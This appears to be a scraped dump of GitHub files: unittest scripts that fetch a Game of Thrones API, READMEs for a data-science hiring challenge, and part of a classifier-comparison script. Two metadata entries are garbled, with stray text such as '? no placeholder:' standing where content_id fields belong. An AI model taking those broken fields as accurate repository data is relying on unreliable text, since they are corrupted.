\"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. 
It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n try:\n with open('hdrs.json') as f0:\n l0 = f0.read()\n self.logger.info(l0)\n except:\n return\n\n l1 = l0.split(',')\n parts = []\n for x in l1:\n l2 = re.sub(r'[<>]', '', x)\n l3 = l2.strip().split(';')\n for y in l3:\n l4 = y.strip()\n self.logger.info(str(Configuration.instance().isvalid0(l4)) + \"; \" + l4)\n if Configuration.instance().isvalid0(l4):\n parts.append(l4)\n\n self.logger.info(parts)\n\n def test_002(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.mkUrl(page=1, pageSize=10)\n self.assertIsNotNone(v0)\n self.assertIsInstance(v0, str)\n self.assertTrue(len(v0) > 0)\n self.logger.info(v0)\n\n def test_004(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.idx1\n self.assertIsNotNone(v0)\n self.assertIsInstance(v0, str)\n self.assertTrue(len(v0) > 0)\n self.logger.info(v0)\n\n def test_006(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.index()\n self.logger.info(v0)\n self.logger.info(chs.index0)\n\n self.logger.info(str(chs.pages) + \"; \" + str(chs.pageSize))\n\n def test_008(self):\n chs = IceFire(config = Configuration.instance().config, type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = list(next(chs))[0]\n\n v1 = v0[0]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v1 = v0[-1]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v0 = list(next(chs))[0]\n\n v1 = v0[0]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v1 = v0[-1]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. 
The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5659446120262146, "alphanum_fraction": 0.5907595157623291, "avg_line_length": 27.484375, "blob_id": "b4e62c4611f0dd6846ac3de3ea1f30ff8568c853", "content_id": "6fe34888c038215d08166a2e24dd1d337a71d1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7294, "license_type": "no_license", "max_line_length": 92, "num_lines": 256, "path": "/tests/test_Test.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport configparser\nimport json\nimport ast\nfrom urllib.parse import urlparse\n\nimport unittest\n\nfrom blkswn import Stack\nfrom blkswn import Fetcher, Configuration\nfrom blkswn import IceFire\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\nclass Test(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. 
It can list the files in the\n directory.\n \"\"\"\n stack0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n\n for root, dirs, files in os.walk(cls.dir0, topdown=True):\n for name in files:\n cls.files.append(os.path.join(root, name))\n\n cls.files.sort()\n cls.files0 = cls.files.copy()\n cls.logger.info('files: ' + unidecode('; '.join(cls.files)))\n \n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n if not type(self).files:\n type(self).files = type(self).files0\n \n self.file0, *type(self).files = type(self).files\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n self.stack0 = Stack()\n self.assertIsNotNone(self.stack0)\n\n ## Check empty responses\n ## Call prior\n def test_001(self):\n self.test_000()\n self.assertIsNotNone(self.stack0)\n self.logger.info('stack0: ' + str(self.stack0))\n self.assertTrue(self.stack0.is_empty())\n\n def test_002(self):\n self.test_001()\n x0 = \"empty1\"\n with self.assertRaises(IndexError):\n x0 = self.stack0.pop()\n self.logger.info('stack0: ' + x0)\n\n def test_003(self):\n self.test_001()\n x1 = \"empty1\"\n with self.assertRaises(IndexError):\n x1 = self.stack0.peek()\n self.logger.info('stack0: ' + x1)\n\n ### push one\n def test_004(self):\n self.test_001()\n x1 = self.stack0.push(self.x0)\n self.assertIsNone(x1)\n self.assertFalse(self.stack0.is_empty())\n\n ## check identity on pop\n def test_005(self):\n self.test_004()\n x1 = self.stack0.pop()\n self.assertIsNotNone(x1)\n self.logger.info('stack0: ' + x1)\n self.assertEqual(x1, self.x0)\n self.assertIs(x1, self.x0)\n\n ## check identity on peek\n def test_006(self):\n self.test_004()\n x1 = self.stack0.peek()\n self.assertIsNotNone(x1)\n self.logger.info('stack0: ' + x1)\n self.assertEqual(x1, self.x0)\n self.assertIs(x1, self.x0)\n\n ## Check with a load\n def test_007(self):\n self.test_001()\n sz0 = len(self.files)\n self.assertTrue(sz0 > 0)\n self.logger.info('stack0: pushing: sz0: ' + str(sz0))\n\n for name in self.files:\n self.stack0.push(name)\n\n self.assertTrue(self.stack0.size() > 0)\n self.assertEqual(sz0, self.stack0.size())\n\n while sz0 > 0:\n self.stack0.pop()\n sz0 -= 1\n\n self.assertTrue(self.stack0.is_empty())\n\n def test_009(self):\n config = Configuration.instance(file='blkswn.cfg').config\n\n v0 = config.sections()\n self.logger.info(str(v0))\n self.assertIsNotNone(v0)\n self.assertTrue(config['fetcher-proxy'])\n self.logger.info(config['fetcher-proxy']['host'])\n self.logger.info(config['fetcher-proxy']['port'])\n self.logger.info(config['fetcher-proxy']['type'])\n ftchr = Fetcher(logger=self.logger, config=config)\n # ftchr = Fetcher(logger=self.logger)\n self.assertIsNotNone(ftchr)\n self.logger.info(ftchr)\n\n def test_011(self):\n \"\"\"\n This uses the singleton constructed above.\n \"\"\"\n v0 = \"http://www.bt.com/\"\n\n ftchr = Fetcher(logger=self.logger, config=Configuration.instance().config)\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n\n v0 = \"http://www.anapioficeandfire.com/api/characters/2105\"\n ctr = 1;\n while ctr > 0:\n ctr -= 1\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n self.logger.info(str(r.info()))\n self.logger.info(r.read())\n\n def test_013(self):\n \"\"\"\n This uses the singleton constructed above.\n \"\"\"\n\n ftchr = 
Fetcher(logger=self.logger, config=Configuration.instance().config)\n v0 = \"http://www.anapioficeandfire.com/api/characters\"\n ctr = 1;\n while ctr > 0:\n ctr -= 1\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n self.logger.info(str(r.info()))\n self.logger.info(r.read())\n\n\n def test_015(self):\n \"\"\"\n Houses use the Link response header to get the number of pages and the page size.\n \"\"\"\n ftchr = Fetcher(logger=self.logger, config=Configuration.instance().config)\n idx0 = \"https://www.anapioficeandfire.com/api/houses\"\n\n r = ftchr.fetch(url=idx0)\n hdrs = r.info()\n r1 = r.read()\n\n self.assertTrue('Link' in hdrs)\n self.logger.info(hdrs['Link'])\n with open('houses.bytes', 'wb') as f0:\n f0.write(r1)\n\n with open('hdrs.json', 'w') as f0:\n f0.write(hdrs['Link'])\n\n x0 = ast.literal_eval(r1.decode())\n self.logger.info(type(x0))\n self.assertTrue(len(x0) > 0)\n self.logger.info(x0[-1])\n\n def test_017(self):\n \"\"\"\n Houses use the Link response header to get the number of pages and the page size.\n \"\"\"\n ftchr = IceFire(logger=self.logger, config=Configuration.instance().config)\n idx0 = \"https://www.anapioficeandfire.com/api/houses\"\n ftchr.index(url=idx0)\n x0 = ftchr.cpage\n self.logger.info(x0[-1])\n self.logger.info(ftchr.index0)\n\n x1 = urlparse(ftchr.index0[0])\n self.assertIsNotNone(x1)\n self.logger.info(x1.query)\n d0 = Configuration.instance().qparts(x1.query)\n self.logger.info(str(d0))\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5395227670669556, "alphanum_fraction": 0.5488441586494446, "avg_line_length": 23.605504989624023, "blob_id": "6da1be5d9a688ac402727cd084c775dea900aa5b", "content_id": "703c04af418b7c681473ffdba78cc2862b9397f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2682, "license_type": "no_license", "max_line_length": 87, "num_lines": 109, "path": "/blkswn/__main__.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# coding=utf-8\n#\n## @file Frctl0\n# @author weaves\n# @brief Frctl0\n#\n# CLI to Frctl itself an interface to MediaInterface\n\n\"\"\"\nAn command-line stack and queue\n\nUsage:\n blkswn (-h | --help)\n blkswn [-e PATTERN]... [-f FILTER]... [-F FILTER]... 
[options] [<input>]...\n\nArguments:\n input Files, directories, or glob patterns to upload.\n Defaults to current directory.\n\nOptions:\n -h, --help Display help message.\n -l, --log Enable gmusicapi logging.\n -d, --dry-run Output list of songs that would be uploaded.\n -q, --quiet Don't output status messages.\n With -l,--log will display warnings.\n With -d,--dry-run will display parameters.\n -f FILE, --files FILE File containing files.\n -c COMMAND, --command COMMAND What to do: chapters\n\nPatterns can be any valid Python regex patterns.\n\"\"\"\n\nimport logging, os, sys, re\n\nfrom unidecode import unidecode\nfrom docopt import docopt\n\nfrom blkswn import Stack, Queue\n\nQUIET = 25\nlogging.addLevelName(25, \"QUIET\")\n\n\nlogging.basicConfig(filename='blkswn.log', level=QUIET)\nlogger = logging.getLogger('Frctl')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\nblkswn = None\ncli = None\n\ndef main():\n global cli\n cli = dict((key.lstrip(\"-<\").rstrip(\">\"), value)\n for key, value in docopt(__doc__).items())\n\n enable_logging = cli['log']\n\n if cli['quiet']:\n logger.setLevel(QUIET)\n else:\n logger.setLevel(logging.INFO)\n\n if enable_logging:\n logger.setLevel(logging.DEBUG)\n\n for k in cli.items():\n logger.info(k)\n \n files = []\n if cli['files']:\n x0 = cli['files']\n logger.info('files: ' + type(x0).__name__)\n with open(x0[0], encoding=\"utf-8\") as f:\n files = f.read().splitlines()\n\n if len(files) <= 0:\n raise RuntimeError('a file of files is a required argument')\n\n if cli['command']:\n chapter(files)\n\n return\n\ndef chapter(files):\n global cli\n\n ## The new split operator\n h0, *t0 = files\n\n logger.info(\"files: \" + unidecode('; '.join(t0)))\n\n stack0 = Stack()\n\n print(stack0.is_empty())\n\n for f in t0:\n if cli['dry-run']:\n logger.info(\"file: f: \" + unidecode(f))\n continue\n stack0.push(f)\n\n print(stack0.size())\n print(stack0.is_empty())\n\nif __name__ == '__main__':\n sys.argv[0] = re.sub(r'(-script\\.pyw|\\.exe)?$', '', sys.argv[0])\n sys.exit(main())\n" }, { "alpha_fraction": 0.7358961701393127, "alphanum_fraction": 0.7428856492042542, "avg_line_length": 25.342105865478516, "blob_id": "92afc1f30fd24d73476ec7c3beaf8e280ecc0af1"? no placeholder: "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2003, "license_type": "no_license", "max_line_length": 83, "num_lines": 76, "path": "/blkswn/README.md", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "* weaves\n\n** Packaging module is blkswn\n\nThe __init__.py script brings the module imports together.\n\nThere is a singleton Configuration.instance() with utility methods in\n_Fetcher\n\n_Queue.py _version.py _Stack.py are from this package's template. They can\nbe ignored.\n\n__main__.py is a sample command-line script: not implemented.\n\n** ETL Website scraper\n\nThis is a test system for an online website at\n\n https://www.anapioficeandfire.com/api/{type0}?page={page}&pageSize={pageSize}\n\nIt's only a test system and captures to text files.\n\n*** Extract\n\n _Fetcher _IceFire and the test scripts test_Test and test_Test1\n\nLoad the data from the website in pages.\nThe test scripts write to text files.\n\n*** Transform\n\n_IceFireR provides an iterator for each record on the website pages, see test_Test2\n\nThere's a configuration file that I use to make use of a local web proxy.\nblkswn.cfg; see Fetcher. 
There are limits on the number of web-accesses.\n\nThe test scripts produce text files, in which the records are transformed\nto dictionaries: one text file each, books.txt, characters.txt or houses.txt \n\n** Load and Simple Analysis\n\nYou can then load the text file output with a type string \"books\" (or\n{type0}, see IceFire's class variables.)\n\nAnd do some simple analysis. \n\nThis is tested and demonstrated in test_Test3\n\nThis stage uses a file but should be implemented as an iterator stream.\n\n** Improvements\n\n*** web-source: Link response header: next, first, prev, last\n\nI didn't make full use of these. I just count the pages. Some databases\nmight enforce prev and next and not allow incremental page access.\n\n*** Streamed filtering\n\nIceFireA should be able to use an IceFireR as an iterator data source. And\ncaching would be a useful extension for that.\n\n\n\n* This file's Emacs file variables\n\n[ Local Variables: ]\n[ mode:text ]\n[ mode:outline-minor ]\n[ mode:auto-fill ]\n[ fill-column: 75 ]\n[ coding: iso-8859-1-unix ]\n[ comment-column:50 ]\n[ comment-start: \"[ \" ]\n[ comment-end:\"]\" ]\n[ End: ]\n\n" }, { "alpha_fraction": 0.766262412071228, "alphanum_fraction": 0.7747151851654053, "avg_line_length": 56.284210205078125, "blob_id": "92afc1f30fd24d73476ec7c3beaf8e280ecc0af160c51c08c7f5c6126"? no: "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5474, "license_type": "no_license", "max_line_length": 426, "num_lines": 95, "path": "/README.md", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# walter eaves\n\nThis is my answer for the first part bundled into a setup.py package.\n\nThe results are given as a log file of a test_Test4 run; see contrib/test.log\n\nThe test_Test4.py file is in tests/ and contrib/\n\nThe source code is in blkswn/; there is another design README.md in there.\n\nHere are the results.\n\n INFO:Test:setup\n INFO:Test:c). books from API: 12\n INFO:Test:tearDown\n INFO:Test:setup\n INFO:Test:a). House Breakstone is at https://www.anapioficeandfire.com/api/houses/41\n INFO:Test:b). first 40 gender distribution [('Male', 26), ('Female', 14)] \n INFO:Test:d). 2 books have character High Septon https://www.anapioficeandfire.com/api/characters/15\n INFO:Test:tearDown\n\nThere is a huge amount of testing done in the test scripts.\n\nJust to summarize, for testing, this is a simple implementation that interrogates the website a\npage at a time, for each of books, houses and characters. That is re-buffered to give an iterator on\nthe underlying records. That is then written to a text file.\n\nThe text files are re-loaded - in another test script - and processed as\niterators. This means that lazy evaluation should be used for all the web-site\naccess, so it should be possible to run the methods in test_Test4 directly on an\niterator that uses the web-site. I didn't attempt this, but in principle, it\nshould work.\n\nThe code is in the setup.py source distribution. I've also provided my collected\ndata as IceFireR.zip\n\n# If you like this challenge, you will like working with Black Swan's Data Science team!\n\nFirst, before delving into the challenges, we would like to explain that we use version control and virtual environments in our work. We think they are essential to produce good quality stuff and it helps us a lot! So we expect you to do the same whilst working on these challenges. 
Please commit several times as your work progresses with meaningful comments and create a requirements file so we can see what you are working with.\n\nYour end result should be scripts (suitably commented) written in Python (2 or 3) that anyone can easily run, i.e., they need to be a **working solution**. The way you organise them is up to you.\n \nNow, as for the challenges, you will find the data you need in the \"data\" folder; it should be comprised of 3 files: csv_file.csv, json_file.json, txt_file.txt\n\nThe challenges are divided into 4 parts:\n\n__API Access__\n\nThis challenge will involve querying an API and extracting information from it. The API in question provides information on Game of Thrones, allowing one to access information on the houses, characters and books.\n\n* API URL: http://anapioficeandfire.com/api/{SECTION}/{INDEX}\n\nWhere SECTION can be either ‘books’, ‘characters’, or ‘houses’ and INDEX is an integer pointing to a certain entry in a section.\n\nFor example, to access the character Peter Baelish, the full request would be http://anapioficeandfire.com/api/characters/823, where 823 is the index corresponding to that character. \n\nIt's recommended to read the full documentation, which can be found here: https://anapioficeandfire.com/Documentation\n\nWe would like you to answer the following:\n\na) What index corresponds to the house “House Breakstone”?\n \nb) How many males, females and unknown genders are there in the first 40 characters? Note, index 0 does not correspond to a character, so the full range is 1 - 40, both ends inclusive. \n\nc) How many books can be accessed from this API?\n\nd) How many books does the character ‘High Septon’ appear in? (ignoring ‘povcharacters’) \n\nHint: index value of Septon needs to be found first; it is smaller than 20.\n\n__File type manipulation and formatting__\n\nThree files are presented, one CSV, one TXT and one JSON file. Each contains 1000 rows of data. There are two challenges, both involving collating these files into one data frame. The fields in all files are:\n\n'author.properties.friends', 'author.properties.status_count', 'author.properties.verified', 'content.body', 'location.country', 'properties.platform', 'properties.sentiment', 'location.latitude', 'location.longitude'\n\nwhere the ‘.’ indicates a nested field.\n \na) Begin by collating the CSV and TXT files together into one pandas dataframe. The resulting dataframe should be 2000 rows and have all of the columns present in both files.\n\nb) Next, using the created dataframe, integrate the data from the JSON file into the existing columns. The resulting dataframe should now be 3000 rows long.\n\n__Data exploration__\n\nIn this challenge we would like to know something interesting about the data. You are free to explore as you wish, producing plots, tables, statistics, etc. Feel free to use any variables in the dataset or include external data you may consider relevant to complement your analysis. \n\n__Model creation__\n\nThis final task involves creating a predictive model for a response variable, given a set of features. The task is to create a predictive model for the variable ‘properties.sentiment’ using the remaining features in the data set. \n\nThe data files attached should be used to create the model. \n\nWhat we would like to see from this task is your thoughts and decisions on training and testing a model. 
This will include, but is not limited to, considering aspects such as feature selection & creation, parameter tuning of the model and train / validation / test split. \n\nThis task is a blank canvas to work with. The only caveat is that you must be able to explain the methods and models you are using.\n" }, { "alpha_fraction": 0.5806384086608887, "alphanum_fraction": 0.6028979420661926, "avg_line_length": 27.674419403076172, "blob_id": "8a5cb231936e95b9fc59cbe280c6b9ec9acfd287", "content_id": "dbd0a8dd970099b21c1138c2e7dd23f1975e7c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 96, "num_lines": 172, "path": "/tests/test_Test4.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test4.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test of IceFireA\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nimport itertools\nfrom functools import partial\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\nfrom blkswn import IceFireR\nfrom blkswn import IceFireA\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test4(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n def test_008(self):\n d0 = IceFireA.make0()\n\n ## Books from API\n b0 = list(d0['books']._src)\n self.logger.info(\"c). books from API: {0}\".format(len(b0)))\n\n def test_010(self):\n d0 = IceFireA.make0()\n\n h0 = d0['houses']._src # as an iterable\n walk, walk2 = itertools.tee(h0)\n\n # check it can work\n v0 = IceFireA.first_true(walk, default='null')\n\n fpred = lambda x: x['name'].find(\"Breakstone\") > -1\n v0 = IceFireA.first_true(walk2, default='null', pred=fpred)\n\n self.logger.info(\"a). House Breakstone is at {0}\".format(v0['url']))\n\n ## b). How many males, females and unknown genders are there in the first\n ## 40 characters? 
Note, index 0 does not correspond to a character, so\n ## full range is 1 - 40 both ends inclusive.\n\n c0 = d0['characters']._src # as an iterable\n\n c1 = itertools.islice(c0, 40)\n walk, walk2 = itertools.tee(c1)\n\n gndrs = list((x['gender'] for x in walk2))\n gtypes = set(gndrs)\n\n ## lambda functions don't work, try partials\n def snap0(x, tag=\"\"):\n return x == tag\n\n tag0 = list(gtypes)[0]\n snap1 = partial(snap0, tag=tag0)\n v0 = snap1(gndrs[0])\n\n ## List of partials\n\n fpreds = ( partial(snap0, tag=x) for x in gtypes )\n fpreds = list(fpreds)\n\n cnts = list( ( sum(map(fx, gndrs)) for fx in fpreds ))\n self.logger.info(\"b). first 40 gender distribution {} \".format(list(zip(gtypes, cnts))))\n\n ## d) How many books does the character ‘High Septon’ appear in?\n ## (ignoring ‘povcharacters’)\n\n d0 = IceFireA.make0()\n c0 = d0['characters']._src # as an iterable\n\n walk, walk2 = itertools.tee(c0)\n\n fpred = lambda x: x['name'].find(\"High Septon\") > -1\n ckey0 = IceFireA.first_true(walk, default={ 'url': 'null' }, pred=fpred)\n\n ## to match the url of a character in books.characters\n tag0 = ckey0['url']\n snap1 = partial(snap0, tag=tag0)\n\n b0 = d0['books']._src # as an iterable\n walk, walk2 = itertools.tee(b0)\n\n bc = dict(((x['name'], x['characters']) for x in walk2))\n\n x00 = list(bc.values())\n x1 = x00[0]\n \n v0 = ( IceFireA.first_true(x, default='', pred=snap1) for x in x00 )\n v0 = list(v0)\n\n ## if length is greater than 0 is the URL of ckey0\n def snap2(x):\n return int(len(x) > 0)\n\n # finally, apply snap2 and sum \n nckey0 = sum(map(snap2, v0))\n\n self.logger.info(\"d). {0} books have character High Septon {1}\"\n .format(nckey0, ckey0['url']))\n\n pass\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" } ]
20
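A note on the eepgwde/blkswn record above: its IceFire class yields whole pages from the paged API, and IceFireR re-buffers those pages into a per-record iterator. What follows is a minimal sketch of that page-to-record re-buffering pattern, independent of the HTTP layer; fetch_page here is a hypothetical stand-in for IceFire's page fetch, and any callable returning one list of records per page number would do.

import itertools

def records(fetch_page, pages):
    # Flatten a paged source into a single stream of records.
    # fetch_page(n) is assumed to return the list of records for page n.
    return itertools.chain.from_iterable(fetch_page(n) for n in pages)

# Usage with an in-memory stand-in for the web service:
demo = {1: [{'url': 'a'}, {'url': 'b'}], 2: [{'url': 'c'}]}
for rec in records(demo.get, [1, 2]):
    print(rec['url'])

Built this way, an analyzer such as IceFireA could consume the web source lazily instead of the intermediate books.txt/characters.txt/houses.txt files, which is the "Streamed filtering" improvement the embedded README sketches.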
ashish3805/JoyDivision
https://github.com/ashish3805/JoyDivision
58330ec2152f2edd05e27dd8eb5de1f0d0d7659f
6745a5ad79423ec70b76012699f91400d0d3e79b
ee2860d32fc8e280ecc0af160c51c08c7f5c6126
refs/heads/master
2021-05-08T18:36:36.582932
2018-01-08T08:55:57
2018-01-08T08:55:57
119,525,199
1
0
null
2018-01-30T11:14:11
2018-01-08T08:56:16
2018-01-08T08:56:15
null
[ { "alpha_fraction": 0.6897172331809998, "alphanum_fraction": 0.7015424370765686, "avg_line_length": 38.693878173828125, "blob_id": "7778d1d29618fb71455a65297d2225495b25f580", "content_id": "88bcfa1a6d7251e61ea102f30d3380bc52ba3a07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7780, "license_type": "no_license", "max_line_length": 122, "num_lines": 196, "path": "/src/evaluation.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.metrics import accuracy_score, v_measure_score\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom get_train_test import train, test\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.cluster import KMeans\nfrom sklearn.naive_bayes import GaussianNB\nimport xgboost as xgb\nimport subprocess\nfrom sklearn.neighbors import KNeighborsClassifier\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nprint features\n\nprint \"Evaluating on all features \"\nprint \"---------------------------------------------------------------------------------------------------\"\n\nrfc = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=300, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\n\nrfc.fit(train[features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[features]))\n\n#update XGB params\nxgboost = xgb.XGBClassifier(base_score=0.5, colsample_bylevel=1, colsample_bytree=1,\n gamma=0.01, learning_rate=0.1, max_delta_step=0.1, max_depth=5,\n min_child_weight=1, missing=None, n_estimators=500, nthread=-1,\n objective='binary:logistic', reg_alpha=0, reg_lambda=1,\n scale_pos_weight=1, seed=0, silent=True, subsample=1)\nxgboost.fit(train[features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], xgboost.predict(test[features]))\n\n\ngb = GradientBoostingClassifier(criterion='mse', init=None, learning_rate=0.1,\n loss='exponential', max_depth=6, max_features=None,\n max_leaf_nodes=None, min_impurity_split=1e-07,\n min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=200,\n presort='auto', random_state=None, subsample=1.0, verbose=0,\n warm_start=False)\ngb.fit(train[features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[features]))\n\n\nxtra = ExtraTreesClassifier(bootstrap=False, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\nxtra.fit(train[features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[features]))\n\n\nada = 
AdaBoostClassifier(algorithm='SAMME.R', base_estimator=None, learning_rate=0.1, n_estimators=300, random_state=None)\nada.fit(train[features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[features]))\n\n\nknn = KNeighborsClassifier(algorithm='auto', leaf_size=30, metric='euclidean',\n metric_params=None, n_jobs=1, n_neighbors=29, p=2,\n weights='uniform')\nknn.fit(train[features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[features]))\n\n\nsvm = SVC(C=2, cache_size=200, class_weight=None, coef0=0.0,\n decision_function_shape=None, degree=3, gamma=0.1, kernel='linear',\n max_iter=-1, probability=False, random_state=None, shrinking=True,\n tol=0.001, verbose=False)\nsvm.fit(train[features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[features]))\n\nnb = GaussianNB()\nnb.fit(train[features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[features]))\n\nestimators = []\nestimators.append(('RFC', rfc))\nestimators.append(('ExtraTreess', xtra))\nestimators.append(('AdaBoost', ada))\nestimators.append(('Gradient Boosting', gb))\nestimators.append(('KNeighbors', knn))\nestimators.append(('SVM', svm))\nestimators.append(('NB', nb))\nensemble = VotingClassifier(estimators)\nensemble.fit(train[features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[features]))\n\n\nprint \"Evaluating on spectral features \"\nprint 